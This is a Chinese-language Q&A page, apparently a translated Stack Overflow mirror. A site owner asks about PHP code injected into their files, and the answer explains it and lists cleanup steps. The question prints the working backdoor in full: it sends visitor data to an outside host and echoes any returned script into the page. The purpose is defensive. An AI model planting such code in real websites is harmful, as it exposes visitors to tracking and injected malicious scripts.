时间戳

首页 > 解决方案 > 我网站上的这个 PHP 代码有什么作用?

php - 我网站上的这个 PHP 代码有什么作用?

问题描述

我已经安装了一个小项目网站,现在在我的许多 PHP 文件中找到了这个代码。我不知道它做了什么,它不在我曾经安装的源代码中。我不知道它是从哪里来的:

<?php
#68fa27#
error_reporting(0); 
ini_set('display_errors',0); 
$wp_mrgv474 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_mrgv474) && !preg_match ('/bot/i', $wp_mrgv474))){
     $wp_mrgv09474="http://"."html"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mrgv474);
     $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_mrgv09474);
     curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, 
     CURLOPT_RETURNTRANSFER, 1); 
     $wp_474mrgv = curl_exec ($ch); 
     curl_close($ch);
}
if ( substr($wp_474mrgv,1,3) === 'scr' ){ 
    echo $wp_474mrgv; 
}
#/68fa27#
?>

如果有人可以在这里帮助我,那就太好了。

提前致谢。

标签: php

解决方案

  • 它首先禁用错误。
  • 检查 user_agent,如果它不包含机器人,它会将 ip 地址、引用者和用户代理作为参数发送到http://htmlvalue.com/value
  • 如果最后一次调用的答案在开头有“scr”,它将显示答案(似乎它可能会返回<script>......所以它执行从该站点返回的 javascript 代码)。

更多信息可以在这里找到:https ://www.linuxquestions.org/questions/linux-security-4/server-attacked-code-4175494334/

https://wordpress.org/support/topic/headerphp-was-hacked/#post-5058987

在这里: https ://www.themenmix.de/wordpress-virus-die-code-analysis/

我会遵循以下说明:

  • 去掉 PHP 顶行中的脚本后保存原来的 wp-config.php 和 custom-functions.php。

  • 下载并安装最新版本的 WordPress 的全新副本。

  • 删除所有插件并从 WordPress 管理面板中重新安装它们(仅限那些看起来安全的插件)。

  • 更改 WordPress 和 FTP 登录密码以(希望)保护站点免受进一步攻击。

来自https://techjaws.com/php-script-injection-exploit-in-wordpress-271/的细微改动。

推荐阅读